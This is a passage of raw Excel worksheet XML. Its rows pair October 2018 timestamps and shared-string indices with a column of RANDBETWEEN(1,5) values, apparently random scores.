        <v>5526</v>
      </c>
      <c r="F8635">
        <f t="shared" ca="1" si="134"/>
        <v>5</v>
      </c>
    </row>
    <row r="8636" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8636" s="1">
        <v>43382.668032407404</v>
      </c>
      <c r="C8636" t="s">
        <v>10</v>
      </c>
      <c r="D8636" t="s">
        <v>46</v>
      </c>
      <c r="E8636" t="s">
        <v>7675</v>
      </c>
      <c r="F8636">
        <f t="shared" ca="1" si="134"/>
        <v>4</v>
      </c>
    </row>
    <row r="8637" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8637" s="1">
        <v>43382.666493055556</v>
      </c>
      <c r="C8637" t="s">
        <v>10</v>
      </c>
      <c r="D8637" t="s">
        <v>178</v>
      </c>
      <c r="E8637" t="s">
        <v>7676</v>
      </c>
      <c r="F8637">
        <f t="shared" ca="1" si="134"/>
        <v>2</v>
      </c>
    </row>
    <row r="8638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8638" s="1">
        <v>43382.65425925926</v>
      </c>
      <c r="C8638" t="s">
        <v>6</v>
      </c>
      <c r="D8638" t="s">
        <v>25</v>
      </c>
      <c r="F8638">
        <f t="shared" ca="1" si="134"/>
        <v>1</v>
      </c>
    </row>
    <row r="8639" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8639" s="1">
        <v>43382.653067129628</v>
      </c>
      <c r="C8639" t="s">
        <v>6</v>
      </c>
      <c r="D8639" t="s">
        <v>25</v>
      </c>
      <c r="E8639" t="s">
        <v>7677</v>
      </c>
      <c r="F8639">
        <f t="shared" ca="1" si="134"/>
        <v>4</v>
      </c>
    </row>
    <row r="8640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8640" s="1">
        <v>43382.645405092589</v>
      </c>
      <c r="C8640" t="s">
        <v>10</v>
      </c>
      <c r="D8640" t="s">
        <v>23</v>
      </c>
      <c r="E8640" t="s">
        <v>7678</v>
      </c>
      <c r="F8640">
        <f t="shared" ca="1" si="134"/>
        <v>2</v>
      </c>
    </row>
    <row r="8641" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8641" s="1">
        <v>43382.641018518516</v>
      </c>
      <c r="C8641" t="s">
        <v>10</v>
      </c>
      <c r="D8641" t="s">
        <v>11</v>
      </c>
      <c r="E8641" s="2" t="s">
        <v>7679</v>
      </c>
      <c r="F8641">
        <f t="shared" ca="1" si="134"/>
        <v>5</v>
      </c>
    </row>
    <row r="8642" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8642" s="1">
        <v>43382.622557870367</v>
      </c>
      <c r="C8642" t="s">
        <v>10</v>
      </c>
      <c r="D8642" t="s">
        <v>17</v>
      </c>
      <c r="E8642" s="2" t="s">
        <v>7680</v>
      </c>
      <c r="F8642">
        <f t="shared" ref="F8642:F8705" ca="1" si="135">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="8643" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8643" s="1">
        <v>43382.620879629627</v>
      </c>
      <c r="C8643" t="s">
        <v>10</v>
      </c>
      <c r="D8643" t="s">
        <v>94</v>
      </c>
      <c r="E8643" t="s">
        <v>7681</v>
      </c>
      <c r="F8643">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8644" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A8644" s="1">
        <v>43382.597349537034</v>
      </c>
      <c r="C8644" t="s">
        <v>10</v>
      </c>
      <c r="D8644" t="s">
        <v>178</v>
      </c>
      <c r="E8644" s="2" t="s">
        <v>7682</v>
      </c>
      <c r="F8644">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8645" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8645" s="1">
        <v>43382.576944444445</v>
      </c>
      <c r="C8645" t="s">
        <v>10</v>
      </c>
      <c r="D8645" t="s">
        <v>20</v>
      </c>
      <c r="E8645" s="2" t="s">
        <v>7683</v>
      </c>
      <c r="F8645">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8646" s="1">
        <v>43382.576145833336</v>
      </c>
      <c r="C8646" t="s">
        <v>10</v>
      </c>
      <c r="D8646" t="s">
        <v>39</v>
      </c>
      <c r="E8646" t="s">
        <v>7684</v>
      </c>
      <c r="F8646">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8647" s="1">
        <v>43382.536446759259</v>
      </c>
      <c r="C8647" t="s">
        <v>10</v>
      </c>
      <c r="D8647" t="s">
        <v>80</v>
      </c>
      <c r="E8647" t="s">
        <v>7685</v>
      </c>
      <c r="F8647">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8648" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8648" s="1">
        <v>43382.524942129632</v>
      </c>
      <c r="C8648" t="s">
        <v>10</v>
      </c>
      <c r="D8648" t="s">
        <v>6</v>
      </c>
      <c r="E8648" t="s">
        <v>7686</v>
      </c>
      <c r="F8648">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8649" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A8649" s="1">
        <v>43382.520046296297</v>
      </c>
      <c r="C8649" t="s">
        <v>10</v>
      </c>
      <c r="D8649" t="s">
        <v>6</v>
      </c>
      <c r="E8649" s="2" t="s">
        <v>7687</v>
      </c>
      <c r="F8649">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8650" s="1">
        <v>43382.515740740739</v>
      </c>
      <c r="C8650" t="s">
        <v>48</v>
      </c>
      <c r="E8650" t="s">
        <v>7688</v>
      </c>
      <c r="F8650">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8651" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A8651" s="1">
        <v>43382.510277777779</v>
      </c>
      <c r="C8651" t="s">
        <v>10</v>
      </c>
      <c r="D8651" t="s">
        <v>374</v>
      </c>
      <c r="E8651" s="2" t="s">
        <v>7689</v>
      </c>
      <c r="F8651">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8652" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8652" s="1">
        <v>43382.502650462964</v>
      </c>
      <c r="C8652" t="s">
        <v>10</v>
      </c>
      <c r="D8652" t="s">
        <v>11</v>
      </c>
      <c r="E8652" t="s">
        <v>7690</v>
      </c>
      <c r="F8652">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8653" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8653" s="1">
        <v>43382.479756944442</v>
      </c>
      <c r="C8653" t="s">
        <v>10</v>
      </c>
      <c r="D8653" t="s">
        <v>92</v>
      </c>
      <c r="E8653" t="s">
        <v>7691</v>
      </c>
      <c r="F8653">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8654" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A8654" s="1">
        <v>43382.47923611111</v>
      </c>
      <c r="C8654" t="s">
        <v>10</v>
      </c>
      <c r="D8654" t="s">
        <v>163</v>
      </c>
      <c r="E8654" s="2" t="s">
        <v>7692</v>
      </c>
      <c r="F8654">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8655" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8655" s="1">
        <v>43382.470277777778</v>
      </c>
      <c r="C8655" t="s">
        <v>10</v>
      </c>
      <c r="D8655" t="s">
        <v>33</v>
      </c>
      <c r="E8655" t="s">
        <v>7693</v>
      </c>
      <c r="F8655">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8656" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8656" s="1">
        <v>43382.459837962961</v>
      </c>
      <c r="C8656" t="s">
        <v>48</v>
      </c>
      <c r="E8656" t="s">
        <v>7694</v>
      </c>
      <c r="F8656">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8657" s="1">
        <v>43382.438587962963</v>
      </c>
      <c r="C8657" t="s">
        <v>10</v>
      </c>
      <c r="D8657" t="s">
        <v>112</v>
      </c>
      <c r="E8657" t="s">
        <v>7695</v>
      </c>
      <c r="F8657">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8658" s="1">
        <v>43382.427905092591</v>
      </c>
      <c r="C8658" t="s">
        <v>48</v>
      </c>
      <c r="E8658" t="s">
        <v>7696</v>
      </c>
      <c r="F8658">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8659" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8659" s="1">
        <v>43382.423067129632</v>
      </c>
      <c r="C8659" t="s">
        <v>10</v>
      </c>
      <c r="D8659" t="s">
        <v>112</v>
      </c>
      <c r="E8659" t="s">
        <v>7697</v>
      </c>
      <c r="F8659">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8660" s="1">
        <v>43382.416030092594</v>
      </c>
      <c r="C8660" t="s">
        <v>6</v>
      </c>
      <c r="D8660" t="s">
        <v>25</v>
      </c>
      <c r="E8660" t="s">
        <v>7698</v>
      </c>
      <c r="F8660">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8661" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8661" s="1">
        <v>43382.415914351855</v>
      </c>
      <c r="C8661" t="s">
        <v>260</v>
      </c>
      <c r="E8661" s="2" t="s">
        <v>7699</v>
      </c>
      <c r="F8661">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8662" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8662" s="1">
        <v>43382.409502314818</v>
      </c>
      <c r="C8662" t="s">
        <v>71</v>
      </c>
      <c r="E8662" t="s">
        <v>7700</v>
      </c>
      <c r="F8662">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8663" s="1">
        <v>43382.408738425926</v>
      </c>
      <c r="C8663" t="s">
        <v>10</v>
      </c>
      <c r="D8663" t="s">
        <v>52</v>
      </c>
      <c r="E8663" t="s">
        <v>7701</v>
      </c>
      <c r="F8663">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8664" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A8664" s="1">
        <v>43382.391701388886</v>
      </c>
      <c r="C8664" t="s">
        <v>6</v>
      </c>
      <c r="D8664" t="s">
        <v>25</v>
      </c>
      <c r="E8664" s="2" t="s">
        <v>7702</v>
      </c>
      <c r="F8664">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8665" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8665" s="1">
        <v>43382.390601851854</v>
      </c>
      <c r="C8665" t="s">
        <v>461</v>
      </c>
      <c r="E8665" s="2" t="s">
        <v>7703</v>
      </c>
      <c r="F8665">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8666" s="1">
        <v>43382.384305555555</v>
      </c>
      <c r="C8666" t="s">
        <v>10</v>
      </c>
      <c r="D8666" t="s">
        <v>52</v>
      </c>
      <c r="E8666" t="s">
        <v>7704</v>
      </c>
      <c r="F8666">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8667" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A8667" s="1">
        <v>43382.371145833335</v>
      </c>
      <c r="C8667" t="s">
        <v>48</v>
      </c>
      <c r="E8667" s="2" t="s">
        <v>7705</v>
      </c>
      <c r="F8667">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8668" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8668" s="1">
        <v>43382.34615740741</v>
      </c>
      <c r="C8668" t="s">
        <v>542</v>
      </c>
      <c r="E8668" s="2" t="s">
        <v>7706</v>
      </c>
      <c r="F8668">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8669" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8669" s="1">
        <v>43382.317488425928</v>
      </c>
      <c r="C8669" t="s">
        <v>10</v>
      </c>
      <c r="D8669" t="s">
        <v>56</v>
      </c>
      <c r="E8669" s="2" t="s">
        <v>7707</v>
      </c>
      <c r="F8669">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8670" s="1">
        <v>43382.287395833337</v>
      </c>
      <c r="C8670" t="s">
        <v>559</v>
      </c>
      <c r="E8670" t="s">
        <v>7708</v>
      </c>
      <c r="F8670">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8671" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8671" s="1">
        <v>43382.280023148145</v>
      </c>
      <c r="C8671" t="s">
        <v>41</v>
      </c>
      <c r="E8671" t="s">
        <v>7709</v>
      </c>
      <c r="F8671">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8672" s="1">
        <v>43382.250509259262</v>
      </c>
      <c r="C8672" t="s">
        <v>173</v>
      </c>
      <c r="E8672" t="s">
        <v>7710</v>
      </c>
      <c r="F8672">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8673" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8673" s="1">
        <v>43382.249340277776</v>
      </c>
      <c r="C8673" t="s">
        <v>65</v>
      </c>
      <c r="E8673" s="2" t="s">
        <v>7711</v>
      </c>
      <c r="F8673">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8674" s="1">
        <v>43382.236087962963</v>
      </c>
      <c r="C8674" t="s">
        <v>41</v>
      </c>
      <c r="E8674" t="s">
        <v>7712</v>
      </c>
      <c r="F8674">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8675" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A8675" s="1">
        <v>43382.222129629627</v>
      </c>
      <c r="C8675" t="s">
        <v>41</v>
      </c>
      <c r="E8675" s="2" t="s">
        <v>7713</v>
      </c>
      <c r="F8675">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8676" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A8676" s="1">
        <v>43382.214930555558</v>
      </c>
      <c r="C8676" t="s">
        <v>41</v>
      </c>
      <c r="E8676" s="2" t="s">
        <v>7714</v>
      </c>
      <c r="F8676">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8677" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8677" s="1">
        <v>43382.211458333331</v>
      </c>
      <c r="C8677" t="s">
        <v>41</v>
      </c>
      <c r="E8677" s="2" t="s">
        <v>7715</v>
      </c>
      <c r="F8677">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8678" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8678" s="1">
        <v>43382.206736111111</v>
      </c>
      <c r="C8678" t="s">
        <v>2545</v>
      </c>
      <c r="E8678" s="2" t="s">
        <v>7716</v>
      </c>
      <c r="F8678">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8679" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8679" s="1">
        <v>43382.193009259259</v>
      </c>
      <c r="C8679" t="s">
        <v>65</v>
      </c>
      <c r="E8679" t="s">
        <v>7717</v>
      </c>
      <c r="F8679">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8680" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8680" s="1">
        <v>43382.182002314818</v>
      </c>
      <c r="C8680" t="s">
        <v>124</v>
      </c>
      <c r="E8680" s="2" t="s">
        <v>7718</v>
      </c>
      <c r="F8680">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8681" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8681" s="1">
        <v>43382.139016203706</v>
      </c>
      <c r="C8681" t="s">
        <v>41</v>
      </c>
      <c r="E8681" t="s">
        <v>7719</v>
      </c>
      <c r="F8681">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8682" s="1">
        <v>43382.130902777775</v>
      </c>
      <c r="C8682" t="s">
        <v>48</v>
      </c>
      <c r="E8682" t="s">
        <v>7720</v>
      </c>
      <c r="F8682">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8683" s="1">
        <v>43382.114907407406</v>
      </c>
      <c r="C8683" t="s">
        <v>41</v>
      </c>
      <c r="E8683" t="s">
        <v>7721</v>
      </c>
      <c r="F8683">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8684" s="1">
        <v>43382.092997685184</v>
      </c>
      <c r="C8684" t="s">
        <v>10</v>
      </c>
      <c r="D8684" t="s">
        <v>36</v>
      </c>
      <c r="E8684" t="s">
        <v>7722</v>
      </c>
      <c r="F8684">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8685" s="1">
        <v>43382.077476851853</v>
      </c>
      <c r="C8685" t="s">
        <v>10</v>
      </c>
      <c r="D8685" t="s">
        <v>17</v>
      </c>
      <c r="E8685" t="s">
        <v>7723</v>
      </c>
      <c r="F8685">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8686" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A8686" s="1">
        <v>43382.037442129629</v>
      </c>
      <c r="C8686" t="s">
        <v>140</v>
      </c>
      <c r="E8686" s="2" t="s">
        <v>7724</v>
      </c>
      <c r="F8686">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8687" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A8687" s="1">
        <v>43382.008958333332</v>
      </c>
      <c r="C8687" t="s">
        <v>48</v>
      </c>
      <c r="E8687" s="2" t="s">
        <v>7725</v>
      </c>
      <c r="F8687">
        <f t="shared" ca="1" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="8688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8688" s="1">
        <v>43381.973263888889</v>
      </c>
      <c r="C8688" t="s">
        <v>73</v>
      </c>
      <c r="E8688" t="s">
        <v>7726</v>
      </c>
      <c r="F8688">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8689" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8689" s="1">
        <v>43381.94908564815</v>
      </c>
      <c r="C8689" t="s">
        <v>73</v>
      </c>
      <c r="E8689" s="2" t="s">
        <v>7727</v>
      </c>
      <c r="F8689">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8690" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A8690" s="1">
        <v>43381.837847222225</v>
      </c>
      <c r="C8690" t="s">
        <v>10</v>
      </c>
      <c r="D8690" t="s">
        <v>6</v>
      </c>
      <c r="E8690" s="2" t="s">
        <v>7728</v>
      </c>
      <c r="F8690">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8691" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8691" s="1">
        <v>43381.743125000001</v>
      </c>
      <c r="C8691" t="s">
        <v>10</v>
      </c>
      <c r="D8691" t="s">
        <v>94</v>
      </c>
      <c r="E8691" s="2" t="s">
        <v>7729</v>
      </c>
      <c r="F8691">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8692" s="1">
        <v>43381.734259259261</v>
      </c>
      <c r="C8692" t="s">
        <v>10</v>
      </c>
      <c r="D8692" t="s">
        <v>885</v>
      </c>
      <c r="E8692" t="s">
        <v>7730</v>
      </c>
      <c r="F8692">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8693" s="1">
        <v>43381.732789351852</v>
      </c>
      <c r="C8693" t="s">
        <v>10</v>
      </c>
      <c r="D8693" t="s">
        <v>11</v>
      </c>
      <c r="E8693" t="s">
        <v>7731</v>
      </c>
      <c r="F8693">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8694" s="1">
        <v>43381.730694444443</v>
      </c>
      <c r="C8694" t="s">
        <v>10</v>
      </c>
      <c r="D8694" t="s">
        <v>17</v>
      </c>
      <c r="E8694" t="s">
        <v>7732</v>
      </c>
      <c r="F8694">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8695" s="1">
        <v>43381.715150462966</v>
      </c>
      <c r="C8695" t="s">
        <v>10</v>
      </c>
      <c r="D8695" t="s">
        <v>381</v>
      </c>
      <c r="E8695" t="s">
        <v>7733</v>
      </c>
      <c r="F8695">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8696" s="1">
        <v>43381.690613425926</v>
      </c>
      <c r="C8696" t="s">
        <v>1501</v>
      </c>
      <c r="D8696" t="s">
        <v>312</v>
      </c>
      <c r="E8696" t="s">
        <v>7734</v>
      </c>
      <c r="F8696">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8697" s="1">
        <v>43381.685810185183</v>
      </c>
      <c r="C8697" t="s">
        <v>10</v>
      </c>
      <c r="D8697" t="s">
        <v>52</v>
      </c>
      <c r="E8697" t="s">
        <v>7735</v>
      </c>
      <c r="F8697">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8698" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8698" s="1">
        <v>43381.677939814814</v>
      </c>
      <c r="C8698" t="s">
        <v>144</v>
      </c>
      <c r="E8698" s="2" t="s">
        <v>7736</v>
      </c>
      <c r="F8698">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8699" s="1">
        <v>43381.620023148149</v>
      </c>
      <c r="C8699" t="s">
        <v>10</v>
      </c>
      <c r="D8699" t="s">
        <v>158</v>
      </c>
      <c r="E8699" t="s">
        <v>7737</v>
      </c>
      <c r="F8699">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8700" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A8700" s="1">
        <v>43381.618379629632</v>
      </c>
      <c r="C8700" t="s">
        <v>10</v>
      </c>
      <c r="D8700" t="s">
        <v>17</v>
      </c>
      <c r="E8700" s="2" t="s">
        <v>7738</v>
      </c>
      <c r="F8700">
        <f t="shared" ca="1" si="135"/>
        <v>5</v>
      </c>
    </row>
    <row r="8701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8701" s="1">
        <v>43381.607372685183</v>
      </c>
      <c r="C8701" t="s">
        <v>10</v>
      </c>
      <c r="D8701" t="s">
        <v>6</v>
      </c>
      <c r="E8701" t="s">
        <v>7739</v>
      </c>
      <c r="F8701">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8702" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A8702" s="1">
        <v>43381.606157407405</v>
      </c>
      <c r="C8702" t="s">
        <v>10</v>
      </c>
      <c r="D8702" t="s">
        <v>89</v>
      </c>
      <c r="E8702" s="2" t="s">
        <v>7740</v>
      </c>
      <c r="F8702">
        <f t="shared" ca="1" si="135"/>
        <v>3</v>
      </c>
    </row>
    <row r="8703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8703" s="1">
        <v>43381.57712962963</v>
      </c>
      <c r="C8703" t="s">
        <v>10</v>
      </c>
      <c r="D8703" t="s">
        <v>20</v>
      </c>
      <c r="E8703" t="s">
        <v>7741</v>
      </c>
      <c r="F8703">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8704" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A8704" s="1">
        <v>43381.563634259262</v>
      </c>
      <c r="C8704" t="s">
        <v>10</v>
      </c>
      <c r="D8704" t="s">
        <v>192</v>
      </c>
      <c r="E8704" s="2" t="s">
        <v>7742</v>
      </c>
      <c r="F8704">
        <f t="shared" ca="1" si="135"/>
        <v>1</v>
      </c>
    </row>
    <row r="8705" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8705" s="1">
        <v>43381.554548611108</v>
      </c>
      <c r="C8705" t="s">
        <v>43</v>
      </c>
      <c r="D8705" t="s">
        <v>312</v>
      </c>
      <c r="E8705" s="2" t="s">
        <v>7743</v>
      </c>
      <c r="F8705">
        <f t="shared" ca="1" si="135"/>
        <v>2</v>
      </c>
    </row>
    <row r="8706" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8706" s="1">
        <v>43381.539398148147</v>
      </c>
      <c r="C8706" t="s">
        <v>10</v>
      </c>
      <c r="D8706" t="s">
        <v>17</v>
      </c>
      <c r="E8706" s="2" t="s">
        <v>7744</v>
      </c>
      <c r="F8706">
        <f t="shared" ref="F8706:F8769" ca="1" si="136">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="8707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8707" s="1">
        <v>43381.530335648145</v>
      </c>
      <c r="C8707" t="s">
        <v>10</v>
      </c>
      <c r="D8707" t="s">
        <v>6</v>
      </c>
      <c r="E8707" t="s">
        <v>7745</v>
      </c>
      <c r="F8707">
        <f t="shared" ca="1" si="136"/>
        <v>4</v>
      </c>
    </row>
    <row r="8708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8708" s="1">
        <v>43381.52988425926</v>
      </c>
      <c r="C8708" t="s">
        <v>97</v>
      </c>
      <c r="E8708" t="s">
        <v>7746</v>
      </c>
      <c r="F8708">
        <f t="shared" ca="1" si="136"/>
        <v>3</v>
      </c>
    </row>
    <row r="8709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8709" s="1">
        <v>43381.522106481483</v>
      </c>
      <c r="C8709" t="s">
        <v>10</v>
      </c>
      <c r="D8709" t="s">
        <v>23</v>
      </c>
      <c r="E8709" t="s">
        <v>7747</v>
      </c>
      <c r="F8709">
        <f t="shared" ca="1" si="136"/>
        <v>3</v>
      </c>
    </row>
    <row r="8710" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8710" s="1">
        <v>43381.493831018517</v>
      </c>
      <c r="C8710" t="s">
        <v>10</v>
      </c>
      <c r="D8710" t="s">
        <v>46</v>
      </c>
      <c r="E8710" t="s">
        <v>7748</v>
      </c>
      <c r="F8710">
        <f t="shared" ca="1" si="136"/>
        <v>4</v>
      </c>
    </row>
    <row r="8711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8711" s="1">
        <v>43381.46497685185</v>
      </c>
      <c r="C8711" t="s">
        <v>71</v>
      </c>
      <c r="E8711" t="s">
        <v>7749</v>
      </c>
      <c r="F8711">
        <f t="shared" ca="1" si="136"/>
        <v>5</v>
      </c>
    </row>
    <row r="8712" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8712" s="1">
        <v>43381.459814814814</v>
      </c>
      <c r="C8712" t="s">
        <v>10</v>
      </c>
      <c r="D8712" t="s">
        <v>6</v>
      </c>
      <c r="E8712" s="2" t="s">
        <v>7750</v>
      </c>
      <c r="F8712">
        <f t="shared" ca="1" si="136"/>
        <v>5</v>
      </c>
    </row>
    <row r="8713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8713" s="1">
        <v>43381.456469907411</v>
      </c>
      <c r="C8713" t="s">
        <v>10</v>
      </c>
      <c r="D8713" t="s">
        <v>89</v>
      </c>
